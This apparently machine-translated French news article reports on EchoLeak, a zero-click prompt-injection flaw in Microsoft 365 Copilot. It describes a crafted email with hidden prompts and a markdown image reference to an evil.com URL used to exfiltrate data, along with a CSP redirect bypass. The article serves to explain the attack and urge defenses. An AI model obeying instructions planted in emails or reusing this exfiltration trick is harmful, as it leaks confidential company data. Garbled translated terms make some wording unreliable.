Un seul e-mail peut déclencher silencieusement Copilot pour exfiltrer les données d’entreprise sensibles – pas de clics, pas d’avertissements, pas d’action utilisateur.
Imaginez une attaque si furtive qu’elle ne nécessite pas de clics, pas de téléchargements, pas d’avertissement – juste un e-mail assis dans votre boîte de réception. Il s’agit d’Echoleak, une vulnérabilité critique dans le copilote Microsoft 365 qui permet aux pirates de voler des données d’entreprise sensibles sans une seule action de la victime.
Découvert par AIM Security, il s’agit de la première attaque en clic zéro documenté contre un agent d’IA, exposant les risques invisibles qui se cachent dans les outils d’IA que nous utilisons chaque jour.
Un e-mail conçu est tout ce qu’il faut. Copilot le traite silencieusement, suit des invites cachées, fouille à travers des fichiers internes et envoie des données confidentielles, tout en glissant devant les défenses de sécurité de Microsoft, selon le billet de blog de la société.
« C’est une pure armement de la force fondamentale de l’IA, une compréhension contextuelle, contre elle-même », a déclaré Abhishek Anant Garg, analyste au QKS Group. « Les luttes de sécurité de l’entreprise parce qu’elle est construite pour un code malveillant, pas un langage qui a l’air inoffensif mais qui agit comme une arme. »
Ce type de vulnérabilité représente une menace significative, a averti Nader Henein, analyste VP chez Gartner. « Compte tenu de la complexité des assistants de l’IA et des services basés sur les chiffons, ce n’est certainement pas le dernier que nous verrons. »
Mécanisme d’exploitation d’Echoleak
Echoleak exploite la capacité de Copilot à gérer à la fois les données internes de confiance (comme les e-mails, les chats d’équipes et les fichiers OneDrive) et les entrées externes non fiables, telles que les e-mails entrants. L’attaque commence par un e-mail malveillant contenant une syntaxe spécifique de Markdown, «Like! (Image Alt Text) (Réf) (Réf): https://www.evil.com?param=
La chaîne d’exploitation repose sur trois vulnérabilités, y compris une redirection ouverte dans la politique de sécurité du contenu de Microsoft (CSP), qui fait confiance aux domaines comme les équipes et SharePoint. Cela permet aux attaquants de masquer les demandes malveillantes comme légitimes, en contournant les défenses de Microsoft contre les attaques d’injection entre les compressions croisées (XPIA).
« Echoleak expose la fausse sécurité des déploiements en phase d’IA », a noté Garg. AIM Security classe ce défaut comme une «violation de la portée LLM», où les invites non fiables manipulent l’IA dans l’accès aux données en dehors de sa portée prévue. « Les attaquants peuvent faire référence au contenu d’autres parties du contexte LLM pour extraire des informations sensibles, transformant la capacité de l’IA à synthétiser en un vecteur d’exfiltration de données », a déclaré Garg.
Les chercheurs ont également trouvé d’autres faiblesses similaires, laissant entendre que d’autres systèmes d’IA utilisant la même technologie pourraient être à risque. Microsoft a déclaré que cela avait corrigé la vulnérabilité, confirmant qu’aucun client n’était affecté et qu’aucune attaque réelle ne s’était produite.
Écho au-delà de Microsoft
« Echoleak marque un passage aux architectures de l’hypothèse de compromis », a déclaré Garg. «Les entreprises doivent désormais supposer que l’injection rapide contradictoire se produira, ce qui rend la surveillance comportementale en temps réel et la modélisation des menaces spécifiques aux agents exigences existentielles.»
Alors que l’IA devient un aliment de base en milieu de travail, les analystes exhortent une validation d’entrée robuste et l’isolement des données. Henein a averti que des attaques ciblées telles que «l’envoi d’un e-mail à un CFO pour voler des données sur les bénéfices avant la divulgation» sont particulièrement préoccupantes.
Tout système d’IA construit sur la génération (RAG) de la récupération pourrait être à risque s’il traite les entrées externes aux côtés de données internes sensibles. Les défenses traditionnelles comme les balises DLP ne parviennent souvent pas à empêcher de telles attaques et peuvent nuire aux fonctionnalités de Copilot lorsqu’elles sont activées, Garg a expliqué: «La vulnérabilité prouve que les périmètres traditionnels n’ont pas de sens lorsque l’IA peut être manipulée pour violer les frontières grâce à des entrées apparemment innocentes.»
Pour les secteurs comme la banque, les soins de santé et la défense, ces outils de productivité peuvent doubler en tant que puissants mécanismes d’exfiltration. «Les DSI doivent désormais concevoir des systèmes d’IA en supposant une autonomie contradictoire», a déclaré Garg. «Chaque agent est une fuite de données potentielle et doit subir une validation de l’équipe rouge avant la production.»
Repenser la sécurité de l’IA
Echoleak montre que l’IA de qualité d’entreprise n’est pas à l’abri du compromis silencieux, et la sécuriser ne s’apprête pas à corriger les couches. « Les agents de l’IA exigent un nouveau paradigme de protection », a déclaré Garg. «La sécurité d’exécution doit être la norme minimale viable.»
Le défaut révèle également des problèmes structurels plus profonds dans l’IA moderne. «L’IA agentique souffre d’un effondrement du contexte», a expliqué Garg. «Il mélange des données entre les domaines de sécurité et ne peut pas distinguer ce à quoi il peut accéder et ce qu’il devrait, transformant la synthèse en escalade de privilèges.»
À mesure que la surface d’attaque de l’IA se développe, Echoleak prouve que même les systèmes les plus sophistiqués peuvent être armées en exploitant la propre logique de l’IA. « Pour l’instant », a conclu Garg, « les CISO devraient faire confiance, mais vérifier et réfléchir à deux fois avant de laisser l’IA lire votre boîte de réception. »
Plus de nouvelles de la sécurité Microsoft:
- Microsoft lance un programme de sécurité européen pour contrer les menaces d’État-nation
- Microsoft fait le premier pas vers l’avenir sans mot de passe
- Microsoft pousse beaucoup de produits sur les utilisateurs, mais voici une cybersécurité peut embrasser
